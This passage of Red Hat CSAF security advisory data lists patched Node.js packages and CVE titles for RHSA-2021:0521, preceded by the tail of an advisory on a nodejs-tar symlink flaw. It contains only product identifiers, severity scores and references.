"AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0246" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "products": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite" } ] }
rhsa-2021_0521
Vulnerability from csaf_redhat
Published
2021-02-15 18:28
Modified
2024-11-15 09:39
Summary
Red Hat Security Advisory: rh-nodejs10-nodejs security update
Notes
Topic
An update for rh-nodejs10-nodejs is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
The following packages have been upgraded to a later upstream version: rh-nodejs10-nodejs (10.23.1).
Security Fix(es):
* libuv: buffer overflow in realpath (CVE-2020-8252)
* nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS (CVE-2020-7754)
* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)
* nodejs-ini: prototype pollution via malicious INI file (CVE-2020-7788)
* nodejs-dot-prop: prototype pollution (CVE-2020-8116)
* nodejs: use-after-free in the TLS implementation (CVE-2020-8265)
* npm: sensitive information exposure through logs (CVE-2020-15095)
* nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function (CVE-2020-15366)
* nodejs-yargs-parser: prototype pollution vulnerability (CVE-2020-7608)
* nodejs: HTTP request smuggling via two copies of a header field in an http request (CVE-2020-8287)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for rh-nodejs10-nodejs is now available for Red Hat Software Collections.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.\n\nThe following packages have been upgraded to a later upstream version: rh-nodejs10-nodejs (10.23.1).\n\nSecurity Fix(es):\n\n* libuv: buffer overflow in realpath (CVE-2020-8252)\n\n* nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS (CVE-2020-7754)\n\n* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)\n\n* nodejs-ini: prototype pollution via malicious INI file (CVE-2020-7788)\n\n* nodejs-dot-prop: prototype pollution (CVE-2020-8116)\n\n* nodejs: use-after-free in the TLS implementation (CVE-2020-8265)\n\n* npm: sensitive information exposure through logs (CVE-2020-15095)\n\n* nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function (CVE-2020-15366)\n\n* nodejs-yargs-parser: prototype pollution vulnerability (CVE-2020-7608)\n\n* nodejs: HTTP request smuggling via two copies of a header field in an http request (CVE-2020-8287)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:0521", "url": "https://access.redhat.com/errata/RHSA-2021:0521" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "1840004", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1840004" }, { "category": "external", "summary": "1856875", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1856875" }, { "category": "external", "summary": "1857977", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1857977" }, { "category": "external", "summary": "1868196", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1868196" }, { "category": "external", "summary": "1879315", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1879315" }, { "category": "external", "summary": "1892430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1892430" }, { "category": "external", "summary": "1898680", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898680" }, { "category": "external", "summary": "1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "1912854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912854" }, { "category": "external", "summary": "1912863", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912863" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_0521.json" } ], "title": "Red Hat Security Advisory: rh-nodejs10-nodejs security update", "tracking": { "current_release_date": "2024-11-15T09:39:32+00:00", "generator": { "date": "2024-11-15T09:39:32+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2021:0521", "initial_release_date": "2021-02-15T18:28:29+00:00", "revision_history": [ { "date": "2021-02-15T18:28:29+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-02-15T18:28:29+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-15T09:39:32+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } }, { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } }, { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } }, { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } } ], "category": "product_family", "name": "Red Hat Software Collections" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "product": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "product_id": "rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-nodejs@10.23.1-2.el7?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "product": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "product_id": "rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-nodejs@10.23.1-2.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "product": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "product_id": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-nodejs-devel@10.23.1-2.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "product": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "product_id": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-npm@6.14.10-10.23.1.2.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "product": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "product_id": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-nodejs-debuginfo@10.23.1-2.el7?arch=x86_64" } } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "product": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "product_id": "rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-nodejs@10.23.1-2.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "product": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "product_id": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-nodejs-devel@10.23.1-2.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "product": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "product_id": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-npm@6.14.10-10.23.1.2.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "product": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "product_id": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-nodejs-debuginfo@10.23.1-2.el7?arch=s390x" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "product": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "product_id": "rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-nodejs@10.23.1-2.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "product": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "product_id": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-nodejs-devel@10.23.1-2.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "product": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "product_id": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-npm@6.14.10-10.23.1.2.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "product": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "product_id": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-nodejs-debuginfo@10.23.1-2.el7?arch=ppc64le" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "product": { "name": "rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "product_id": "rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs10-nodejs-docs@10.23.1-2.el7?arch=noarch" } } } ], "category": "architecture", "name": "noarch" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le" }, "product_reference": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x" }, "product_reference": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64" }, "product_reference": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le" }, "product_reference": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x" }, "product_reference": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64" }, "product_reference": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch" }, "product_reference": "rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le" }, "product_reference": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x" }, "product_reference": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" }, "product_reference": "rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64" }, "product_reference": "rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le" }, "product_reference": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x" }, "product_reference": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64" }, "product_reference": "rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 